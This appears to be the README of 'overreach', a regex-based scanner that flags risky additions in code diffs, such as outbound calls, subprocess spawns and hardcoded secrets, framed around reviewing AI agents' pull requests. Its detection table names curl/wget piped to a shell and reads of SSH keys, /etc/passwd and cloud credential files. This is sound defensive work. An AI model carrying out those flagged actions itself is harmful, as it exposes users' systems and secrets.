Catch code that overreaches before it merges. A single fast binary that scans a diff, file, or whole repo for code reaching beyond what it should — outbound network calls, subprocess spawns, sensitive-file reads, curl | sh, disabled TLS, and hardcoded secrets — and prints graded findings. No runtime, no daemon, no config. Think ripgrep, but for what this code is allowed to touch.
Built for the age of AI coding agents: when an agent ships a PR, the dangerous change is rarely the feature — it's the quiet fetch to an unknown host or the execSync that wasn't there yesterday. overreach catches that line.
$ git diff | overreach --diff
CRITICAL src/util.js:15 [pipe_to_shell]
Downloads a script and pipes it straight into a shell
CRITICAL src/util.js:16 [hardcoded_secret]
Possible hardcoded Anthropic credential (value redacted)
HIGH src/util.js:13 [network_call]
Makes an outbound network call
5 finding(s): 2 critical, 3 high, 0 medium, 0 low
FAIL (findings at/above high)
Code review optimizes for "is the feature correct?" — not "did this diff quietly gain a new capability?" As autonomous agents get write access to real repositories, the second question is the one that bites. overreach is a fast, zero-config first pass that answers it, locally, before anything merges.
- Diff-aware. Scans only the added lines of a unified diff, so you see what a change introduces, not what was already there.
- Secrets are reported, never echoed. A hardcoded key is flagged by provider ("Anthropic", "AWS") with the literal value redacted —
overreachnever prints a credential back at you. - CI-ready.
--jsonoutput and a configurable--fail-onseverity make it a one-line PR gate. - Dependency-light. Two crates (
regex,serde). No network access, no telemetry, nothing phones home.
cargo install --path . --locked
# or, once published:
# cargo install overreach --lockedProduces a single static-ish binary. Drop it anywhere on PATH.
overreach [PATH] # scan a file or directory (default: .)
git diff | overreach --diff # scan only the added lines of a diff
overreach --diff --json # machine-readable output for CI
overreach . --fail-on critical # only fail the build on critical findings| Flag | Effect |
|---|---|
--diff |
Read a unified diff from stdin; scan added lines only |
--json |
Emit findings + summary as JSON |
--fail-on <level> |
Exit non-zero at/above low|medium|high|critical (default high) |
-h, --help |
Help |
-V, --version |
Version |
Exit code is 0 when nothing is at/above --fail-on, 1 otherwise — so it slots straight into a pipeline.
| Kind | Severity | What it flags |
|---|---|---|
pipe_to_shell |
critical | curl/wget … | sh — downloading and executing a script in one breath |
hardcoded_secret |
critical | Provider-prefixed credentials (Anthropic, OpenAI, GitHub, AWS, Slack, Google, GitLab, Stripe). Value redacted. |
sensitive_fs_read |
critical | References to .ssh/, id_rsa, /etc/passwd, .aws/credentials, .env, .npmrc |
network_call |
high | fetch, axios, requests.*, urllib, raw sockets, WebSockets |
subprocess_spawn |
high | child_process, exec/execSync, spawn, subprocess.*, os.system, process::Command |
tls_verification_disabled |
medium | rejectUnauthorized: false, verify=False, InsecureSkipVerify: true, NODE_TLS_REJECT_UNAUTHORIZED |
file_too_large_to_scan |
low | Files exceeding the 8 MiB per-file cap are skipped and reported — coverage gap, not a content finding |
This is a fast, regex-based first pass — it favors catching things over zero false positives. It is not a full taint analysis; treat findings as "look here," not "proven exploit."
# .github/workflows/overreach.yml
name: overreach
on: pull_request
# Minimum-privilege token: this job only needs to read source.
permissions:
contents: read
jobs:
overreach:
runs-on: ubuntu-latest
steps:
# Pin third-party actions to commit SHAs (with the tag as a comment)
# so a compromised upstream tag can't silently change what runs in CI.
- uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4
with:
fetch-depth: 0
# Don't leave GITHUB_TOKEN in .git/config — `cargo build` runs
# build scripts from every transitive dep.
persist-credentials: false
- uses: dtolnay/rust-toolchain@29eef336d9b2848a0b548edc03f92a220660cdb8 # stable
# --locked enforces the committed Cargo.lock.
- run: cargo build --release --locked
- name: Scan the PR diff
env:
# Route the trigger value through env so it can't be interpolated
# into the shell script body.
BASE_REF: ${{ github.base_ref }}
run: git diff "origin/$BASE_REF...HEAD" | ./target/release/overreach --diff --fail-on highA composite action is provided in action.yml for reuse.
overreach is the standalone, language-agnostic cousin of CapabilityEcho from the agent-gov suite — the same idea (catch capability drift in a diff), repackaged as one fast binary with no Node and no suite to adopt. Use overreach for a quick gate anywhere; reach for the full agent-gov suite when you want cross-tool consolidation and a single PR verdict.
MIT © Connor Hickey